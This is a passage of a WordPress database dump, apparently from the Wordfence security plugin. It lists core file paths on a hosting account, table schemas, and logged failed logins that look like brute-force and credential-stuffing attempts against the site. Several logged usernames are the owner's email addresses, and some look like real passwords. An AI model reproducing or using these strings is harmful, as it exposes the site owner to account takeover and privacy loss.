(5685, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/README.md', 'wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),
(5686, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519.php', 'wp-includes/sodium_compat/src/Core32/Curve25519.php'),
(5687, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Ed25519.php', 'wp-includes/sodium_compat/src/Core32/Ed25519.php'),
(5688, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/HChaCha20.php', 'wp-includes/sodium_compat/src/Core32/HChaCha20.php'),
(5689, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/HSalsa20.php', 'wp-includes/sodium_compat/src/Core32/HSalsa20.php'),
(5690, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Int32.php', 'wp-includes/sodium_compat/src/Core32/Int32.php'),
(5691, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Int64.php', 'wp-includes/sodium_compat/src/Core32/Int64.php'),
(5692, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Poly1305/State.php', 'wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),
(5693, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Poly1305.php', 'wp-includes/sodium_compat/src/Core32/Poly1305.php'),
(5694, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Salsa20.php', 'wp-includes/sodium_compat/src/Core32/Salsa20.php'),
(5695, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/SecretStream/State.php', 'wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),
(5696, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/SipHash.php', 'wp-includes/sodium_compat/src/Core32/SipHash.php'),
(5697, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Util.php', 'wp-includes/sodium_compat/src/Core32/Util.php'),
(5698, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/X25519.php', 'wp-includes/sodium_compat/src/Core32/X25519.php'),
(5699, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/XChaCha20.php', 'wp-includes/sodium_compat/src/Core32/XChaCha20.php'),
(5700, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/XSalsa20.php', 'wp-includes/sodium_compat/src/Core32/XSalsa20.php'),
(5701, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Crypto.php', 'wp-includes/sodium_compat/src/Crypto.php'),
(5702, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Crypto32.php', 'wp-includes/sodium_compat/src/Crypto32.php'),
(5703, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/File.php', 'wp-includes/sodium_compat/src/File.php'),
(5704, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php', 'wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),
(5705, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/SodiumException.php', 'wp-includes/sodium_compat/src/SodiumException.php'),
(5706, '/home/equipm11/public_html/happythinking.com/wp-includes/spl-autoload-compat.php', 'wp-includes/spl-autoload-compat.php'),
(5707, '/home/equipm11/public_html/happythinking.com/wp-includes/style-engine/class-wp-style-engine-css-declarations.php', 'wp-includes/style-engine/class-wp-style-engine-css-declarations.php'),
(5708, '/home/equipm11/public_html/happythinking.com/wp-includes/style-engine/class-wp-style-engine-css-rule.php', 'wp-includes/style-engine/class-wp-style-engine-css-rule.php'),
(5709, '/home/equipm11/public_html/happythinking.com/wp-includes/style-engine/class-wp-style-engine-css-rules-store.php', 'wp-includes/style-engine/class-wp-style-engine-css-rules-store.php'),
(5710, '/home/equipm11/public_html/happythinking.com/wp-includes/style-engine/class-wp-style-engine-processor.php', 'wp-includes/style-engine/class-wp-style-engine-processor.php'),
(5711, '/home/equipm11/public_html/happythinking.com/wp-includes/style-engine/class-wp-style-engine.php', 'wp-includes/style-engine/class-wp-style-engine.php'),
(5712, '/home/equipm11/public_html/happythinking.com/wp-includes/style-engine.php', 'wp-includes/style-engine.php'),
(5713, '/home/equipm11/public_html/happythinking.com/wp-includes/taxonomy.php', 'wp-includes/taxonomy.php'),
(5714, '/home/equipm11/public_html/happythinking.com/wp-includes/template-canvas.php', 'wp-includes/template-canvas.php'),
(5715, '/home/equipm11/public_html/happythinking.com/wp-includes/template-loader.php', 'wp-includes/template-loader.php'),
(5716, '/home/equipm11/public_html/happythinking.com/wp-includes/template.php', 'wp-includes/template.php'),
(5717, '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/comments.php', 'wp-includes/theme-compat/comments.php'),
(5718, '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/embed-404.php', 'wp-includes/theme-compat/embed-404.php'),
(5719, '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/embed-content.php', 'wp-includes/theme-compat/embed-content.php');
INSERT INTO `wpou_wfknownfilelist` VALUES
(5720, '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/embed.php', 'wp-includes/theme-compat/embed.php'),
(5721, '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/footer-embed.php', 'wp-includes/theme-compat/footer-embed.php'),
(5722, '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/footer.php', 'wp-includes/theme-compat/footer.php'),
(5723, '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/header-embed.php', 'wp-includes/theme-compat/header-embed.php'),
(5724, '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/header.php', 'wp-includes/theme-compat/header.php'),
(5725, '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/sidebar.php', 'wp-includes/theme-compat/sidebar.php'),
(5726, '/home/equipm11/public_html/happythinking.com/wp-includes/theme-i18n.json', 'wp-includes/theme-i18n.json'),
(5727, '/home/equipm11/public_html/happythinking.com/wp-includes/theme-previews.php', 'wp-includes/theme-previews.php'),
(5728, '/home/equipm11/public_html/happythinking.com/wp-includes/theme-templates.php', 'wp-includes/theme-templates.php'),
(5729, '/home/equipm11/public_html/happythinking.com/wp-includes/theme.json', 'wp-includes/theme.json'),
(5730, '/home/equipm11/public_html/happythinking.com/wp-includes/theme.php', 'wp-includes/theme.php'),
(5731, '/home/equipm11/public_html/happythinking.com/wp-includes/update.php', 'wp-includes/update.php'),
(5732, '/home/equipm11/public_html/happythinking.com/wp-includes/user.php', 'wp-includes/user.php'),
(5733, '/home/equipm11/public_html/happythinking.com/wp-includes/vars.php', 'wp-includes/vars.php'),
(5734, '/home/equipm11/public_html/happythinking.com/wp-includes/version.php', 'wp-includes/version.php'),
(5735, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-nav-menu-widget.php', 'wp-includes/widgets/class-wp-nav-menu-widget.php'),
(5736, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-archives.php', 'wp-includes/widgets/class-wp-widget-archives.php'),
(5737, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-block.php', 'wp-includes/widgets/class-wp-widget-block.php'),
(5738, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-calendar.php', 'wp-includes/widgets/class-wp-widget-calendar.php'),
(5739, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-categories.php', 'wp-includes/widgets/class-wp-widget-categories.php'),
(5740, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-custom-html.php', 'wp-includes/widgets/class-wp-widget-custom-html.php'),
(5741, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-links.php', 'wp-includes/widgets/class-wp-widget-links.php'),
(5742, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-media-audio.php', 'wp-includes/widgets/class-wp-widget-media-audio.php'),
(5743, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-media-gallery.php', 'wp-includes/widgets/class-wp-widget-media-gallery.php'),
(5744, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-media-image.php', 'wp-includes/widgets/class-wp-widget-media-image.php'),
(5745, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-media-video.php', 'wp-includes/widgets/class-wp-widget-media-video.php'),
(5746, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-media.php', 'wp-includes/widgets/class-wp-widget-media.php'),
(5747, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-meta.php', 'wp-includes/widgets/class-wp-widget-meta.php'),
(5748, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-pages.php', 'wp-includes/widgets/class-wp-widget-pages.php'),
(5749, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-recent-comments.php', 'wp-includes/widgets/class-wp-widget-recent-comments.php'),
(5750, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-recent-posts.php', 'wp-includes/widgets/class-wp-widget-recent-posts.php'),
(5751, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-rss.php', 'wp-includes/widgets/class-wp-widget-rss.php'),
(5752, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-search.php', 'wp-includes/widgets/class-wp-widget-search.php'),
(5753, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-tag-cloud.php', 'wp-includes/widgets/class-wp-widget-tag-cloud.php'),
(5754, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-text.php', 'wp-includes/widgets/class-wp-widget-text.php'),
(5755, '/home/equipm11/public_html/happythinking.com/wp-includes/widgets.php', 'wp-includes/widgets.php'),
(5756, '/home/equipm11/public_html/happythinking.com/wp-includes/wp-db.php', 'wp-includes/wp-db.php'),
(5757, '/home/equipm11/public_html/happythinking.com/wp-includes/wp-diff.php', 'wp-includes/wp-diff.php'),
(5758, '/home/equipm11/public_html/happythinking.com/wp-links-opml.php', 'wp-links-opml.php'),
(5759, '/home/equipm11/public_html/happythinking.com/wp-load.php', 'wp-load.php'),
(5760, '/home/equipm11/public_html/happythinking.com/wp-login.php', 'wp-login.php'),
(5761, '/home/equipm11/public_html/happythinking.com/wp-mail.php', 'wp-mail.php'),
(5762, '/home/equipm11/public_html/happythinking.com/wp-settings.php', 'wp-settings.php'),
(5763, '/home/equipm11/public_html/happythinking.com/wp-signup.php', 'wp-signup.php'),
(5764, '/home/equipm11/public_html/happythinking.com/wp-trackback.php', 'wp-trackback.php'),
(5765, '/home/equipm11/public_html/happythinking.com/xmlrpc.php', 'xmlrpc.php');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wflivetraffichuman`
--

CREATE TABLE `wpou_wflivetraffichuman` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `expiration` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`,`identifier`),
  KEY `expiration` (`expiration`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wflocs`
--

CREATE TABLE `wpou_wflocs` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `ctime` int(10) unsigned NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT 0.0000000,
  `lon` float(10,7) DEFAULT 0.0000000,
  PRIMARY KEY (`IP`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wflogins`
--

CREATE TABLE `wpou_wflogins` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `hitID` int(11) DEFAULT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `fail` tinyint(3) unsigned NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `UA` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`IP`,`fail`),
  KEY `hitID` (`hitID`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_wflogins`
--

INSERT INTO `wpou_wflogins` VALUES
(9309, 33070, 1694685505.014301, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz¢‘á', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9310, 33071, 1694685508.083841, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿSnd', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9311, 33072, 1694685515.485675, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgª›', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9312, 33073, 1694685522.197042, 1, 'loginFailInvalidUsername', 'abceasyas123123!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ô¢Ö', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9289, 33052, 1694685392.625948, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÀøB', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9290, 33052, 1694685392.636518, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÀøB', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9291, 33053, 1694685395.886335, 1, 'loginFailInvalidUsername', 'abceasyas123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ²%', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9292, 33054, 1694685399.031209, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿXÌ¾æ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(8845, 31642, 1692901900.383230, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈW[@', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8846, 31643, 1692901903.831733, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)T‡¶', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8847, 31644, 1692901924.471669, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ½¶x', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8848, 31645, 1692901927.553109, 1, 'loginFailInvalidUsername', 'password', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿe2l„', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8849, 31646, 1692901931.012097, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿqµ¹\0', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8850, 31647, 1692901939.581835, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³¶".', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8851, 31648, 1692901945.113789, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±´*', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8852, 31649, 1692901949.344582, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz­É', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9050, 32372, 1694031235.505467, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ),§', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9687, 41242, 1701143257.052909, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ@ã¦T', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9688, 41254, 1701150146.956887, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¸c', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9266, 33031, 1694685259.849862, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿXó¶ï', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9267, 33032, 1694685263.468669, 1, 'loginFailInvalidUsername', '000521521000!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ|ý<¶', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9268, 33033, 1694685267.396902, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‰;Ý0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9269, 33034, 1694685274.026677, 1, 'loginFailInvalidUsername', 'bluesky1211234!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuèC”', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9270, 33035, 1694685278.205654, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn©Ü“', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9271, 33036, 1694685282.043108, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgK)ï', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9272, 33037, 1694685304.967977, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«ûè#', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9273, 33038, 1694685310.250353, 1, 'loginFailInvalidUsername', 'happythinking1!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·Rj@', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9274, 33039, 1694685314.087425, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ|m/>', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9275, 33040, 1694685319.642771, 1, 'loginFailInvalidUsername', '3ddaaade350b269e1!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq´\0Ö', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9276, 33041, 1694685323.242994, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´òÂZ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9277, 33041, 1694685323.252769, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´òÂZ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9278, 33042, 1694685341.683300, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsbéB', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9279, 33043, 1694685350.537858, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµ^ø‹', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9280, 33044, 1694685354.906403, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ{Oò', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9281, 33045, 1694685357.986063, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ_:\n~', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9282, 33046, 1694685365.263196, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿnŠ_m', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9326, 33086, 1694685605.750767, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$DÜM', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9313, 33074, 1694685526.613206, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿœÓ:', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9314, 33075, 1694685530.673915, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1“•', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9315, 33076, 1694685536.653095, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´·\r^', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9316, 33077, 1694685540.683578, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿"ò', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9317, 33078, 1694685550.266741, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ''%j', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9318, 33079, 1694685556.317418, 1, 'loginFailInvalidUsername', 'happythinking@126.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz m', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9319, 33080, 1694685559.696513, 1, 'loginFailInvalidUsername', 'admin@happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿˆègb', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9320, 33081, 1694685564.743088, 1, 'loginFailInvalidUsername', 'abceasyas123!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ''!\\+', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9321, 33082, 1694685586.918563, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿñRì', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9322, 33083, 1694685590.329363, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅœ]Y', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9323, 33084, 1694685594.294869, 1, 'loginFailInvalidUsername', '0005215210001', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsLd¾', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9324, 33084, 1694685594.305919, 1, 'loginFailInvalidUsername', '0005215210001', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsLd¾', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9325, 33085, 1694685600.079565, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿNºð', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9283, 33047, 1694685368.883347, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq¥­Š', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(10306, 50745, 1711910978.818572, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜*¶¿', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10305, 50730, 1711863551.161339, 1, 'loginFailInvalidUsername', 'worksm8_wp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(10304, 50729, 1711863550.271808, 1, 'loginFailInvalidUsername', 'worksm8_wp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
